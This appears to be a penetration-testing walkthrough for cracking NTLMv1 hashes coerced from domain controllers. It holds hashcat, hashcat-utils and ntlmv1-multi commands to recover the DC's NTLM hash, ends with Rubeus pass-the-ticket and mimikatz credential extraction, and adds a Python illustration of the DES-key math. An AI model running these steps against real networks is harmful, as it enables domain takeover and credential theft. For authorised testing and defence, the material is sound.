
ntlmv1-multi

As discussed in 7MS #591 (and there is also a wonderful guide at crack.sh), this tool is awesome for taking the downgraded hashes you can coerce from domain controllers (if the LANMAN settings are set right (well... wrong)) and then eventually cracking them to recover the NTLM hash to use for passing/impersonating.

Starting at the point where you've captured a downgraded hash:

Use ntlmv1-multi to parse the hash

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Prep hash for cracking

As a first step, get the hash ready (we recommend doing the cracking somewhere with some horsepower, like vast.ai):

echo "14B8DF571CF877A8:1122334455667788">>14000.hash
echo "7CEAB088CDD16386:1122334455667788">>14000.hash

Crack the hash!

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

On a vast.ai instance, the DES_full.charset might actually be in /hashcat/charsets/DES_full.hcchr

The results will look something like this:

14B8DF571CF877A8:1122334455667788:$HEX[STRING1]
7CEAB088CDD16386:1122334455667788:$HEX[STRING2]

Convert DES keys to NTLM keys

In the previous step, the STRING1 and STRING2 values are DES keys and not NTLM keys, so we need to convert them using deskey_to_ntlm.pl which comes with hashcat-utils.

deskey_to_ntlm.pl STRING1
deskey_to_ntlm.pl STRING2

Let's call the outputs of these operations STRING1NTLM and STRING2NTLM going forward.

On a vast.ai instance, the deskey_to_ntlm.pl might be in /hashcat-utils/src/deskey_to_ntlm

Calculate the last 4 characters of the hash:

./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788
LAST4

In the example above, LAST4 represents the output of ./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788

On a vast.ai instance, the ct3_to_ntlm.bin might be located in ~/hashcat-utils/src

Putting it all together

Now that you have STRING1NTLM, STRING2NTLM and LAST4, concatenate them in that order to make the NTLM hash of the domain controller!

STRING1NTLMSTRING2NTLMLAST4
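The reason the hashcat output has to go through deskey_to_ntlm.pl, why the third piece is only four hex characters, and why the three pieces simply concatenate into the NTLM hash all come from how NTLMv1 builds its response (MS-NLMP): the 16-byte NT hash is padded with five zero bytes to 21 bytes, cut into three 7-byte pieces, and each piece is expanded into an 8-byte DES key by inserting an odd-parity bit into every byte. Hashcat mode 14000 recovers those 8-byte DES keys, so the parity bits have to be stripped to get the hash bytes back, and the third key only carries 16 bits of real hash, which is why ct3_to_ntlm.bin can compute it directly. The following Python is an added illustration of that math, written for this page; it is not code from the 7MS post, ntlmv1-multi, or hashcat-utils. It assumes the NT hash of an empty password (the well-known constant 31d6cfe0d16ae931b73c59d7e0c089c0) as sample input and builds a hashcat-style result line from it; the ciphertext and challenge in that constructed line are copied from the post for shape only and are not a real DES encryption under that key.

```python
"""Added example: NTLMv1 DES-key <-> NT-hash conversion (not from the original post)."""

# Sample input: NT hash of the empty password (well-known constant), used only for the demo.
NT_HASH_EMPTY = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")


def expand_des_key(key7: bytes) -> bytes:
    """Turn 7 bytes of key material into an 8-byte DES key with odd parity per byte.

    Every 7 key bits become the top 7 bits of an output byte; the low bit is set
    so that each byte has an odd number of 1 bits (classic DES key parity).
    """
    if len(key7) != 7:
        raise ValueError("expected 7 bytes of key material")
    bits = int.from_bytes(key7, "big")  # 56 bits
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        byte = seven << 1
        if bin(seven).count("1") % 2 == 0:  # even so far -> parity bit makes it odd
            byte |= 1
        out.append(byte)
    return bytes(out)


def des_key_to_ntlm(key8: bytes) -> bytes:
    """Inverse of expand_des_key: drop each byte's parity bit (what deskey_to_ntlm.pl does)."""
    if len(key8) != 8:
        raise ValueError("expected an 8-byte DES key")
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def has_odd_parity(key8: bytes) -> bool:
    """True if every byte of the DES key has an odd number of 1 bits."""
    return all(bin(b).count("1") % 2 == 1 for b in key8)


def nt_hash_to_des_keys(nt_hash: bytes) -> list:
    """Split a 16-byte NT hash into the three DES keys NTLMv1 derives from it.

    The hash is zero-padded to 21 bytes; the third 7-byte piece therefore holds
    only two real hash bytes, so the third DES key has just 2**16 possibilities.
    """
    if len(nt_hash) != 16:
        raise ValueError("NT hash must be 16 bytes")
    padded = nt_hash + b"\x00" * 5
    return [expand_des_key(padded[i:i + 7]) for i in (0, 7, 14)]


def parse_hashcat_line(line: str) -> bytes:
    """Extract the recovered DES key from a hashcat -m 14000 result line.

    Accepts 'CIPHERTEXT:CHALLENGE:$HEX[..]' (hashcat's hex wrapper) or a raw
    8-character password field; rejects keys whose parity is not odd.
    """
    _ct, _challenge, plain = line.strip().split(":", 2)
    if plain.startswith("$HEX[") and plain.endswith("]"):
        key = bytes.fromhex(plain[5:-1])
    else:
        key = plain.encode("latin-1")
    if len(key) != 8 or not has_odd_parity(key):
        raise ValueError("not a well-formed DES key: " + plain)
    return key


def reassemble_nt_hash(string1_ntlm: str, string2_ntlm: str, last4: str) -> str:
    """Concatenate the two 14-hex-char converted keys and the 4-hex-char tail."""
    if len(string1_ntlm) != 14 or len(string2_ntlm) != 14 or len(last4) != 4:
        raise ValueError("expected 14 + 14 + 4 hex characters")
    return (string1_ntlm + string2_ntlm + last4).lower()


def demo() -> str:
    """Round trip: NT hash -> DES keys -> hashcat-style lines -> converted pieces -> NT hash."""
    k1, k2, k3 = nt_hash_to_des_keys(NT_HASH_EMPTY)
    # Constructed result lines; the ciphertext/challenge fields are copied from the post for shape.
    lines = ["14B8DF571CF877A8:1122334455667788:$HEX[%s]" % k1.hex(),
             "7CEAB088CDD16386:1122334455667788:$HEX[%s]" % k2.hex()]
    string1_ntlm = des_key_to_ntlm(parse_hashcat_line(lines[0])).hex()
    string2_ntlm = des_key_to_ntlm(parse_hashcat_line(lines[1])).hex()
    # ct3_to_ntlm.bin yields these two bytes; here we take them from the third key directly.
    last4 = des_key_to_ntlm(k3)[:2].hex()
    return reassemble_nt_hash(string1_ntlm, string2_ntlm, last4)


if __name__ == "__main__":
    print(demo() == NT_HASH_EMPTY.hex())
```

Running demo() rebuilds the original NT hash from the three pieces, which is the same concatenation the post does by hand. The structure also explains the defensive side: because the response leaks the NT hash through three independent DES operations against a known challenge, the only real fix is to refuse NTLMv1 outright via the LAN Manager authentication level setting the post alludes to, rather than hardening the hash itself.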

Now you can use Rubeus to do an asktgt using the RC4 value (STRING1NTLMSTRING2NTLMLAST4), pass it with Rubeus and /ptt, and then use mimikatz to extract important hashes!